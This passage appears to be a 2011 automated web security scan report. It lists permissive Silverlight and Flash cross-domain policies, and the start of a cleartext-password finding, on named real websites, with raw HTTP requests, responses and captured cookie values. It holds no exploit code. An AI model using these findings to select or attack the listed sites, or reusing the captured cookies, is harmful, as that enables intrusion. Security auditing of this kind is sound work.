Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224450647; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 05 Mar 2010 14:20:32 GMT
ETag: "2d0006-d5-6b072c00"
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="s.xe.com" />
</cross-do
...[SNIP]...

8. Silverlight cross-domain policy
There are 22 instances of this issue:


8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 01 Apr 2011 13:36:57 GMT
Expires: Fri, 01 Apr 2011 13:36:54 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83994
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.3. http://www.cbssports.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Tue, 10 Mar 2009 20:50:52 GMT
Accept-Ranges: bytes
Content-Length: 458
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:25:08 GMT
X-Media: ws901-fe.tm
Connection: close
Content-Type: application/xml

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="*" />
<domain uri="http://*.akamai.net" />
<domain uri="http://*.g.akamai.net"/>
<domain uri="http://beyond.download.akamai.com" />
...[SNIP]...

8.4. http://www.coveritlive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.coveritlive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.coveritlive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Debian) PHP/5.2.5-3 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8n
Last-Modified: Wed, 21 Oct 2009 03:57:31 GMT
ETag: "a7430f-145-47669fa5ec0c0"
Accept-Ranges: bytes
Content-Length: 325
Content-Type: application/xml
X-Cache-Lookup: MISS from web2.cil:80
Date: Sat, 02 Apr 2011 13:56:28 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

8.5. http://www.intellicast.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intellicast.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.intellicast.com

Response

HTTP/1.1 200 OK
Content-Length: 337
Content-Type: text/xml
Content-Location: http://www.intellicast.com/clientaccesspolicy.xml
Last-Modified: Thu, 11 Nov 2010 13:19:23 GMT
Accept-Ranges: bytes
ETag: "764b6fea381cb1:2092"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:22 GMT
Connection: close
Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt=ffffffff094a140a45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:26:25 GMT;path=/;httponly

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

8.6. http://www.nadaguides.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nadaguides.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.nadaguides.com

Response

HTTP/1.1 200 OK
Content-Length: 337
Content-Type: text/xml
Last-Modified: Fri, 26 Mar 2010 16:16:58 GMT
Accept-Ranges: bytes
ETag: "0f92dc2ffccca1:55ba"
Server: Microsoft-IIS/6.0
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
X-NADAGuides: NY#3
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:51:58 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

8.7. http://www.ncm.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 314

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*"/>
           </allow-from>
           <grant-to>
               <r
...[SNIP]...

8.8. http://www.opinionshere.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opinionshere.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.opinionshere.com

Response

HTTP/1.1 200 OK
Set-Cookie: opinions_here=a500240$50$0$6$140b0403$1021b3a; Version=1; path=/; expires=Sun, 3-Apr-2011 2:27:58 GMT
Content-Type: text/xml
Last-Modified: Wed, 04 Nov 2009 22:13:43 GMT
Accept-Ranges: bytes
ETag: "65455129c5dca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:01:37 GMT
Connection: close
Content-Length: 297

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/
...[SNIP]...

8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.safelinkwireless.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.safelinkwireless.com

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: ISAWPLB{4DECF60D-BA16-4115-9714-1CF8AB2032B9}={64003EC6-801B-4F64-A518-5B565EEAD292}; HttpOnly; Path=/
Content-Length: 337
Date: Sat, 02 Apr 2011 13:43:48 GMT
Content-Type: text/xml
ETag: "073fa486d98c91:0"
Server: Microsoft-IIS/7.5
Accept-Ranges: bytes
Last-Modified: Thu, 26 Feb 2009 23:52:30 GMT
X-Powered-By: ASP.NET

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

8.10. http://www.usatoday.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:59:11 GMT
Accept-Ranges: bytes
ETag: "80d976d8f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sat, 02 Apr 2011 13:32:43 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

8.11. http://www.winbuyer.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.winbuyer.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.winbuyer.com

Response

HTTP/1.1 200 OK
Content-Length: 405
Content-Type: text/xml
Last-Modified: Thu, 17 Feb 2011 10:42:46 GMT
Accept-Ranges: bytes
ETag: "3ed2eb698fcecb1:bc6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:41:52 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
- <access-policy>
- <cross-domain-access>
- <policy>
- <allow-from http-request-headers="*">
<domain uri="*" />
...[SNIP]...

8.12. http://www.cbs.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Sep 2009 19:09:25 GMT
X-Real-Server: ws3224.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=299
Date: Sat, 02 Apr 2011 13:27:27 GMT
Content-Length: 654
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://cbs.com"/>
<domain uri="http://*.cbs.com"/>
<domain uri="http://*.bigspaceship.com"/>
<domain uri="http://vsallaccess.com"/>
<domain uri="http://*.vsallaccess.com"/>
<domain uri="http://*.vsallaccess.com.edgesuite.net"/>
<domain uri="http://*.vsallaccess.com.edgesuite.net"/>
...[SNIP]...

8.13. http://www.cnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 13 Mar 2011 05:24:12 GMT
Via: 1.1 C aicache6
Content-Length: 533
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Sat, 02 Apr 2011 13:26:05 GMT

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...

8.14. http://www.fidelity.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fidelity.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.fidelity.com

Response

HTTP/1.0 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Type: text/xml
Last-Modified: Wed, 16 Feb 2011 22:16:37 GMT
Content-Length: 449
ETag: "1c1-4d5c4cc5"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:33 GMT
Connection: close
Set-Cookie: MC=5LM7vGj3KIcaxyS0ZfIdqN7TCGcSAk2XJXEKAyjuIABNSAABqjMGBAAAAQAGBU2XJXEAP03; path=/; domain=.fidelity.com; expires=Sun, 01-Apr-2012 13:32:33 GMT
Set-Cookie: v1st=77844EBB51D035FB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fidelity.com

<?xml version="1.0" encoding="UTF-8" ?>
<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="http://*.fmr.com" />
               <domain uri="https://*.fmr.com" />
               <domain uri="http://*.fidelity.com" />
               <domain uri="https://*.fidelity.com" />
...[SNIP]...

8.15. http://www.indiatimes.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.indiatimes.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Dec 2009 03:54:10 GMT
ETag: "9d432e958383ca1:6ea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 778
Cache-Control: max-age=259144
Date: Sat, 02 Apr 2011 14:02:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://*.indiatimes.com"/>
</a
...[SNIP]...
<domain uri="122.166.10.43" />
...[SNIP]...
<domain uri="http://121.243.172.93" />
...[SNIP]...

8.16. http://www.msnbc.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT
Accept-Ranges: bytes
ETag: "04f15705474ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:08 GMT
Connection: close
Content-Length: 533

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*" >
<domain uri="http://msnbc-ugc.interactive.msnbc.com"/>
<domain uri="http://*.interactive.msnbc.com"/>
<domain uri="http://*.msnbc.msn.com"/>
<domain uri="https://*.msnbc.msn.com"/>
...[SNIP]...

8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 408
Xonnection: Xeep-Alive
Content-Type: text/xml
X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80
Cache-Control: max-age=14400
Expires: Sat, 02 Apr 2011 17:27:37 GMT
Date: Sat, 02 Apr 2011 13:27:37 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-methods="*">
<domain uri="http://*.stimulant.io"/>
<domain uri="http://*.nationalgeographic.com"/>
...[SNIP]...

8.18. http://www.sky.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sky.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.sky.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 02 Dec 2008 19:48:26 GMT
ETag: "c040-1a2-9c5ed680"
Accept-Ranges: bytes
Cache-Control: max-age=180
Expires: Sat, 02 Apr 2011 14:02:15 GMT
Content-Type: text/xml
Content-Length: 418
Date: Sat, 02 Apr 2011 13:59:15 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*.sky.com"/>
<domain uri="https://*.sky.com"/>
...[SNIP]...

8.19. http://www.xbox.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xbox.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.xbox.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 02:13:36 GMT
Accept-Ranges: bytes
ETag: "088663f92eacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:36:21 GMT
Connection: close
Content-Length: 383

...<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="http://*.xbox.com" />
<domain uri="https://*.xbox.com" />
...[SNIP]...

8.20. http://www.kmart.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 17 Sep 2010 03:13:18 GMT
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 1917
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://dfstaging.digitalfolio.com" />
    <domain uri="https://dfstaging.digitalfolio.com" />
    <domain uri="http://dfstaging.cloudapp.net" />
    <domain uri="https://dfstaging.cloudapp.net" />
    <domain uri="http://dfproduction.digitalfolio.com" />
    <domain uri="https://dfproduction.digitalfolio.com" />
    <domain uri="http://dfproduction.cloudapp.net" />
    <domain uri="https://dfproduction.cloudapp.net" />
    <domain uri="http://www.digitalfolio.com" />
    <domain uri="https://www.digitalfolio.com" />
    <domain uri="http://digitalfolio.com" />
    <domain uri="https://digitalfolio.com" />
    <domain uri="http://sears.digitalfolio.com" />
    <domain uri="https://sears.digitalfolio.com" />
    <domain uri="http://mstaging.digitalfolio.com" />
    <domain uri="https://mstaging.digitalfolio.com" />
    <domain uri="http://mstaging.cloudapp.net" />
    <domain uri="https://mstaging.cloudapp.net" />
    <domain uri="http://mproduction.digitalfolio.com" />
    <domain uri="https://mproduction.digitalfolio.com" />
    <domain uri="http://mproduction.cloudapp.net" />
    <domain uri="https://mproduction.cloudapp.net" />
    <domain uri="http://m.digitalfolio.com" />
    <domain uri="https://m.digitalfolio.com" />
    <domain uri="http://sears.m.digitalfolio.com" />
    <domain uri="https://sears.m.digitalfolio.com" />
    <domain uri="http://local.digitalfolio.com:81" />
    <domain uri="http://m.digitalfolio.com:81" />
    <domain uri="http://analytics.digitalfolio.com" />
    <domain uri="https://analytics.digitalfolio.com" />
...[SNIP]...

8.21. http://www.sears.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sears.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.sears.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Fri, 17 Sep 2010 03:13:24 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:23:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:23:34 GMT
Content-Length: 1917
Connection: close
s-srvr:

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://dfstaging.digitalfolio.com" />
    <domain uri="https://dfstaging.digitalfolio.com" />
    <domain uri="http://dfstaging.cloudapp.net" />
    <domain uri="https://dfstaging.cloudapp.net" />
    <domain uri="http://dfproduction.digitalfolio.com" />
    <domain uri="https://dfproduction.digitalfolio.com" />
    <domain uri="http://dfproduction.cloudapp.net" />
    <domain uri="https://dfproduction.cloudapp.net" />
    <domain uri="http://www.digitalfolio.com" />
    <domain uri="https://www.digitalfolio.com" />
    <domain uri="http://digitalfolio.com" />
    <domain uri="https://digitalfolio.com" />
    <domain uri="http://sears.digitalfolio.com" />
    <domain uri="https://sears.digitalfolio.com" />
    <domain uri="http://mstaging.digitalfolio.com" />
    <domain uri="https://mstaging.digitalfolio.com" />
    <domain uri="http://mstaging.cloudapp.net" />
    <domain uri="https://mstaging.cloudapp.net" />
    <domain uri="http://mproduction.digitalfolio.com" />
    <domain uri="https://mproduction.digitalfolio.com" />
    <domain uri="http://mproduction.cloudapp.net" />
    <domain uri="https://mproduction.cloudapp.net" />
    <domain uri="http://m.digitalfolio.com" />
    <domain uri="https://m.digitalfolio.com" />
    <domain uri="http://sears.m.digitalfolio.com" />
    <domain uri="https://sears.m.digitalfolio.com" />
    <domain uri="http://local.digitalfolio.com:81" />
    <domain uri="http://m.digitalfolio.com:81" />
    <domain uri="http://analytics.digitalfolio.com" />
    <domain uri="https://analytics.digitalfolio.com" />
...[SNIP]...

8.22. http://www.usa.gov/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usa.gov
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.usa.gov

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4e056cd0848e8725c5138c4294450f6f:1279821224"
Last-Modified: Thu, 22 Jul 2010 17:37:45 GMT
Accept-Ranges: bytes
Content-Length: 410
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:06:11 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="http://prod.usa.gov"/>

...[SNIP]...

9. Cleartext submission of password
There are 4 instances of this issue:


9.1. http://www.collegehumor.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
